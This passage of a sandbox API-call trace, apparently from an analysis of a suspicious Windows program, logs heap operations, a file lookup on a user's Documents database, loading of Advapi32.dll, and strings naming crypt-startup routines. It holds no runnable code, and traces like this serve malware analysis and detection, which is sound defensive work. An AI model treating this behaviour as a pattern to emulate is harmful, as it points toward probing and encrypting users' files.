(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0261.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c28 [0261.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0261.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0261.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0261.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0261.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0261.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0261.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0261.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0261.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0261.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0261.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0261.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0261.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0261.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0261.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0261.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0261.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0261.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0261.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0261.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0261.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0261.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0261.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0261.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0261.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0261.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0261.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0261.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0261.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0261.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0261.534] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0261.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0261.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0261.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0261.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0261.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0261.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0261.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0261.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0261.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0261.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0261.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0261.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0261.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0261.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0261.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0261.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0261.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0261.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0261.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0261.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0261.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0261.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0261.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0261.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0261.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0261.535] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0261.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0261.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0261.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0261.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0261.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0261.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0261.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0261.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0261.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0261.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0261.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0261.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0261.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0261.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0261.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0261.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0261.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0261.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0261.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0261.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0261.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0261.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0261.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0261.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0261.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0261.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0261.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0261.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0261.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0261.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0261.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0261.537] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0261.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0261.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0261.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0261.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0261.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0261.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0261.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0261.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0261.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0261.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0261.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0261.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0261.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0261.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0261.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0261.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0261.537] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0261.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0261.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0261.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0261.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0261.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0261.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0261.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0261.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0261.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0261.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0261.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0261.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0261.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0261.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0261.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0261.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0261.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0261.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0261.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0261.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0261.538] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/Database1.accdb", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x9daec75b, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="Database1.accdb", cAlternateFileName="DATABA~1.ACC")) returned 0xa87110 [0261.538] FindClose (in: hFindFile=0xa87110 | out: hFindFile=0xa87110) returned 1 [0261.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0261.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0261.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0261.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0261.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0261.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0261.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0261.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0261.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0261.539] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0261.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0261.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0261.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0261.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0261.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0261.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0261.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0261.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0261.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0261.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0261.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0261.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0261.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0261.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0261.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0261.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0261.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0261.540] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0261.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0261.540] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0261.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0261.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0261.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51670 [0261.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0261.540] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0261.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0261.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0261.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0261.540] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0261.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0261.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0261.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518b0 [0261.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0261.540] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0261.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0261.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0261.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0261.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0261.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0261.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0261.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0261.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0261.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0261.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0261.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0261.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0261.541] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0261.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0261.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0261.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0261.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0261.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0261.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0261.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0261.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0261.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0261.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0261.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0261.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0261.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0261.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0261.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0261.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0261.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0261.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0261.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0261.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0261.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0261.541] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0261.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0261.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0261.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0261.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0261.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0261.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0261.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0261.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0261.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0261.542] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0261.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0261.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0261.542] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0261.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0261.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0261.542] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0261.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0261.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0261.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0261.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0261.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0261.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0261.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0261.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0261.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0261.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0261.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0261.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0261.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0261.543] 